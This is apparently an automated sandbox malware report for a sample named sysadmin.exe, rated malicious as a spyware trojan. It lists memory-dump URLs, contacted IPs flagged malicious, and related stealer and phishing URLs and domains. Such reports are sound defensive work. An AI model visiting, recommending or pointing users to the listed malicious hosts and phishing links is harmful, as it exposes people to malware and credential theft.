                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/4mchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/3625chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/3624chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamdb.info/app/sysadmin.exefalse
                                                                                                                                  		high
                                                                                                                                  http://anglebug.com/5007chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/3862chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000005.00000003.1852507283.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851416848.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858659616.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852915521.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851938788.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851383466.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859669568.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://anglebug.com/4836chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://issuetracker.google.com/issues/166475273chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/4384chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://anglebug.com/3970chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://apis.google.comchrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chromecache_80.8.dr, chromecache_83.8.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://labs.google.com/search?source=ntpchrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/#mchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://domains.google.com/suggest/flowchromecache_83.8.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://anglebug.com/7604chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/hjchrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/7761chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/5901chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamdb.info/api/GetAppList/sysadmin.exefalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/3965chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/6439chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/7406chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.google.com/searchchrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://anglebug.com/7161chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://drive-autopush.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.google.com/search?q=$chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://anglebug.com/7162chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/5906chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/2517chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/7mchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/4937chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://issuetracker.google.com/166809097chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://issuetracker.google.com/200067929chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://lens.google.com/v3/2chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://anglebug.com/7847chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://lens.google.com/v3/uploadchrome.exe, 00000005.00000003.1830812840.00002E98006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/%lchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/3832chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://drive-daily-6.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                85.192.63.194
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		47711LINEGROUP-ASRUtrue
                                                                                                                                                                                                                                172.217.18.14
                                                                                                                                                                                                                                		plus.l.google.comUnited States
                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                116.203.166.124
                                                                                                                                                                                                                                		maximu.sbsGermany
                                                                                                                                                                                                                                		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                216.58.206.68
                                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                		unknownunknownfalse

                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                Analysis ID:1590244
                                                                                                                                                                                                                                Start date and time:2025-01-13 20:17:10 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 6m 1s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:15
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:sysadmin.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@29/44@8/8
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 118
                                                                                                                                                                                                                                • Number of non-executed functions: 3
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 142.250.185.131, 216.58.206.78, 74.125.133.84, 199.232.210.172, 216.58.206.46, 142.250.184.227, 142.250.185.238, 192.229.221.95, 142.250.185.170, 142.250.186.170, 142.250.184.234, 142.250.185.106, 142.250.185.138, 142.250.74.202, 172.217.18.10, 172.217.16.202, 142.250.181.234, 142.250.185.74, 142.250.185.202, 142.250.186.74, 142.250.185.234, 216.58.206.74, 142.250.186.42, 142.250.186.106, 4.245.163.56, 2.23.242.162, 13.107.246.45
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                No simulations

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                239.255.255.250http://grastoonm3vides.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  http://ossinquati.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://h3.errantrefrainundocked.shop/riii1.midGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://sharethewebs.click/riii1-b.flvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        phish_alert_sp2_2.0.0.0 (2).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://lgs.gngt.ru/d1MHvwa7NXCAlKk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=http://jet-electric-2014-ltd.jimdosite.com&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                http://blasterstool.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://cortevaopscenter.freshdesk.com/register/FFFaTYjVZRX8bcRDPna0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    85.192.63.194file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 85.192.63.194:5001/uploadfile
                                                                                                                                                                                                                                                    116.203.166.124JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                        build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/?setln=pl
                                                                                                                                                                                                                                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • telegram.dog/
                                                                                                                                                                                                                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                          • t.me/cinoshibot
                                                                                                                                                                                                                                                          jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                          • t.me/cinoshibot

                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          t.meJUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          https://wkybcnfuqpgjx.ltd/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://4q2j5y3.fat-fly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://zyhm9v6.fat-fly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://ld7c8w4lz.fat-fly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://j3nj31k9.fat-fly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://e1afse34v1.fat-fly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          maximu.sbsJUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          play.google.comphish_alert_sp2_2.0.0.0 (2).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 142.250.185.142
                                                                                                                                                                                                                                                          https://lgs.gngt.ru/d1MHvwa7NXCAlKk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 142.250.184.238
                                                                                                                                                                                                                                                          JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 142.250.185.238
                                                                                                                                                                                                                                                          http://unioneconselvano.it/0kktkM-VkjxP-cvXwg-XC4J3-7f72j-pfTsY-7uK529r.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 172.217.16.142
                                                                                                                                                                                                                                                          https://sites.google.com/view/01-25sharepoint/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 142.250.185.238
                                                                                                                                                                                                                                                          https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 216.58.206.46
